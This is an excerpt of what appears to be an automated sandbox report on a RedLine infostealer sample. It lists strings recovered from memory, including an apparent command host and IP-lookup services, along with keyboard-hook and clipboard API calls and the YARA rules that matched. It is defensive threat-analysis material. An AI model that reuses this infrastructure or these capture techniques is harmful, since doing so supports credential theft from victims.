              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
              Source: Appartenga.exe.com, 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430475744.0000000004264000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2422606312.000000000427D000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430658930.000000000427D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
              Source: Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: Appartenga.exe.com, 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430475744.0000000004264000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2422606312.000000000427D000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430658930.000000000427D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
              Source: Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: RegAsm.exe, 0000000A.00000002.3268386087.000000000276E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gimpimageeditor.com
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gimpimageeditor.com/
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gimpimageeditor.com:80/
              Source: RegAsm.exe, 0000000A.00000002.3268386087.000000000276E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gimpimageeditor.comH
              Source: Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: Appartenga.exe.com, 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430475744.0000000004264000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2422606312.000000000427D000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430658930.000000000427D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3268386087.000000000276E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultH
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
              Source: RegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3268386087.000000000276E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
              Source: RegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0t
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/
              Source: RegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetArguments
              Source: RegAsm.exe, 0000000A.00000002.3268386087.000000000276E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetArgumentsH
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetArgumentsLR
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetArgumentsResponse
              Source: RegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetArgumentsT
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesLR
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyScanRequestLR
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyScanRequestResponse
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateLR
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000002.2065078239.0000000000C99000.00000002.00000001.01000000.00000005.sdmp, Appartenga.exe.com, 00000008.00000002.2427249427.0000000000C99000.00000002.00000001.01000000.00000005.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
              Source: Appartenga.exe.com, 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
              Source: Appartenga.exe.com, 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2422606312.000000000427D000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430658930.000000000427D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
              Source: Appartenga.exe.com, 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
              Source: Appartenga.exe.com, 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430475744.0000000004264000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2422606312.000000000427D000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430658930.000000000427D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
              Source: San.adt.0.drString found in binary or memory: https://www.globalsign.com/repository/0
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: https://www.globalsign.com/repository/06

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to register a low level keyboard hook
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_004086AD SetWindowsHookExW 00000002,Function_0000867F,00000000,000000000_2_004086AD
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C44632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,6_2_00C44632
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C44830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00C44830
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C44632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,6_2_00C44632
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C30508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,6_2_00C30508
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C5D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_00C5D164

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 8.3.Appartenga.exe.com.429f508.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 8.3.Appartenga.exe.com.429f508.0.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
              Source: 8.3.Appartenga.exe.com.429f508.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 8.3.Appartenga.exe.com.429f508.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 8.3.Appartenga.exe.com.429f508.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
              Source: 8.3.Appartenga.exe.com.429f508.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 10.2.RegAsm.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 10.2.RegAsm.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
              Source: 10.2.RegAsm.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: Process Memory Space: Appartenga.exe.com PID: 6688, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: Process Memory Space: RegAsm.exe PID: 1520, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C342D5: CreateFileW,DeviceIoControl,CloseHandle,6_2_00C342D5
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C28F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_00C28F2E
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C35778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_00C35778
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_004057820_2_00405782
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_0041302B0_2_0041302B
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_004128F00_2_004128F0
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_0040ADB00_2_0040ADB0
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_004132C30_2_004132C3
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_00412F510_2_00412F51
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BDB0206_2_00BDB020
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BD94E06_2_00BD94E0
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BD9C806_2_00BD9C80
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BF23F56_2_00BF23F5
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C584006_2_00C58400
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C065026_2_00C06502
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BDE6F06_2_00BDE6F0
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C0265E6_2_00C0265E
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BF282A6_2_00BF282A
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C089BF6_2_00C089BF
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C06A746_2_00C06A74
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C50A3A6_2_00C50A3A
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C2EDB26_2_00C2EDB2
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BFCD516_2_00BFCD51
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C50EB76_2_00C50EB7
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C38E446_2_00C38E44
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C06FE66_2_00C06FE6
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BF33B76_2_00BF33B7
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BFF4096_2_00BFF409
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BED45D6_2_00BED45D
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BF16B46_2_00BF16B4
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BDF6A06_2_00BDF6A0
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BEF6286_2_00BEF628
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BD16636_2_00BD1663
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BF78C36_2_00BF78C3
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BF1BA86_2_00BF1BA8
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BFDBA56_2_00BFDBA5
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C09CE56_2_00C09CE5
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BEDD286_2_00BEDD28
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BFBFD66_2_00BFBFD6
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BF1FC06_2_00BF1FC0
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeCode function: 10_2_0250DDE810_2_0250DDE8
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeCode function: 10_2_0250D4F010_2_0250D4F0
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: String function: 004026FC appears 38 times
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: String function: 00BF0D17 appears 70 times
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: String function: 00BE1A36 appears 34 times
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: String function: 00BF8B30 appears 42 times
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs 2YLM6BQ9S3.exe
              Source: 2YLM6BQ9S3.exe, 00000000.00000002.2334161602.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesettings Qt5< vs 2YLM6BQ9S3.exe
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2024866789.00000000025B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesettings Qt5< vs 2YLM6BQ9S3.exe
              Source: 2YLM6BQ9S3.exe, 00000000.00000002.2334653222.000000000076E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 2YLM6BQ9S3.exe
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs 2YLM6BQ9S3.exe
              Source: 2YLM6BQ9S3.exeBinary or memory string: OriginalFilenamesettings Qt5< vs 2YLM6BQ9S3.exe
              Source: 2YLM6BQ9S3.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 8.3.Appartenga.exe.com.429f508.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 8.3.Appartenga.exe.com.429f508.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
              Source: 8.3.Appartenga.exe.com.429f508.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
